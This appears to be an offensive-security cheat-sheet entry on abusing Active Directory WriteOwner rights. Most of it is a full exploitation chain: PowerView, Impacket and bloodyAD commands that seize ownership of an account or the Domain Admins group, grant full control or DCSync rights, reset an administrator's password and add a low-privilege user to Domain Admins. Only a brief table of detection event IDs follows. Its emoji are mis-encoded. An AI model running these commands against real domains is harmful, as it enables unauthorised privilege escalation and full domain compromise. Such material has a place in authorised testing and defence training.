attack-22-writeowner-abuse.md (5080B)
1 --- 2 title: "Attack #22 β WriteOwner Abuse" 3 description: "WriteOwner allows an attacker to change the owner of an AD object to themselves. Since the owner of an object has the implicit right to modify theβ¦" 4 category: active-directory 5 subcategory: "ACL Abuse" 6 tags: ["active-directory", "adcs", "credential-access", "delegation"] 7 tools: ["Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/π‘ Attack #22 β WriteOwner Abuse.md" 11 --- 12 # π‘ Attack #22 β WriteOwner Abuse 13 14 *** 15 16 ## π How It Works 17 18 WriteOwner allows an attacker to **change the owner of an AD object** to themselves. Since the owner of an object has the **implicit right to modify the object's DACL** (WriteDACL), this creates a two-step escalation: take ownership β grant yourself GenericAll/WriteDACL β exploit the object. This is a stepping stone attack, commonly found in enterprise environments due to legacy delegation configurations. 19 20 ### Exploitation Chain 21 22 ``` 23 1. Have WriteOwner on a target object 24 2. Change owner to yourself β Set-DomainObjectOwner 25 3. Now you have implicit WriteDACL 26 4. Grant yourself GenericAll β Add-DomainObjectAcl 27 5. Exploit: reset password / add to group / DCSync / etc. 28 ``` 29 30 *** 31 32 ## βοΈ Prerequisites 33 34 | Requirement | Detail | 35 |---|---| 36 | **WriteOwner ACE on target** | Your principal has WriteOwner in the target's DACL | 37 | **Domain user account** | Any authenticated domain user | 38 39 *** 40 41 ## π οΈ Tools 42 43 | Tool | Platform | Notes | 44 |---|---|---| 45 | **PowerView** | Windows | `Set-DomainObjectOwner`, `Add-DomainObjectAcl` | 46 | **Impacket β owneredit.py** | Linux | Change object ownership remotely | 47 | **Impacket β dacledit.py** | Linux | Modify DACL after taking ownership | 48 | **bloodyAD** | Linux | `set owner` command | 49 50 *** 51 52 ## π» Full Commands 53 54 ### π΄ Full Exploitation Chain (Windows) 55 56 ```powershell 57 # ββ Step 1: Take ownership ββββββββββββββββββββββββββββββββββββββββββββββββββββ 58 Import-Module .\PowerView.ps1 59 Set-DomainObjectOwner -Identity targetadmin -OwnerIdentity low_user -Verbose 60 # Or for a group: 61 Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity low_user 62 63 # ββ Step 2: Grant yourself GenericAll (owner has implicit WriteDACL) ββββββββββ 64 Add-DomainObjectAcl -TargetIdentity targetadmin -PrincipalIdentity low_user -Rights All 65 # Or for domain root (DCSync): 66 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity low_user -Rights DCSync 67 68 # ββ Step 3: Exploit ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 69 # Password reset: 70 Set-DomainUserPassword -Identity targetadmin -AccountPassword ( 71 ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force 72 ) 73 # Or add to group: 74 Add-DomainGroupMember -Identity "Domain Admins" -Members low_user 75 ``` 76 77 ### π΄ Full Exploitation Chain (Linux) 78 79 ```bash 80 # ββ Step 1: Take ownership ββββββββββββββββββββββββββββββββββββββββββββββββββββ 81 owneredit.py -action write -new-owner low_user -target targetadmin \ 82 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 83 84 # ββ Step 2: Grant GenericAll ββββββββββββββββββββββββββββββββββββββββββββββββββ 85 dacledit.py -action write -rights FullControl -principal low_user -target targetadmin \ 86 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 87 88 # ββ Step 3: Exploit ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 89 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 90 set password targetadmin 'P@ssword123!' 91 92 # ββ Or bloodyAD shortcut ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 93 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 94 set owner targetadmin low_user 95 ``` 96 97 *** 98 99 ## π‘οΈ Detection β Event IDs 100 101 | Event ID | Source | What to Look For | 102 |---|---|---| 103 | **4662** | Security Log (DC) | WriteOwner operation on AD object | 104 | **4670** | Security Log (DC) | Permissions changed on an object | 105 | **5136** | Security Log (DC) | Owner attribute modified | 106 107 *** 108 109 ## π Attack Chain Context 110 111 ``` 112 [WriteOwner] βββ Take Ownership β WriteDACL β Full Control 113 β 114 ββββ π Two-step escalation: WriteOwner β WriteDACL β GenericAll 115 ββββ π Chain with: WriteDACL (#21), GenericAll (#19) 116 ββββ π Defeated by: ACL auditing, monitor ownership changes 117 ``` 118 119 *** 120 121 > β **Attack #22 β WriteOwner Abuse complete.**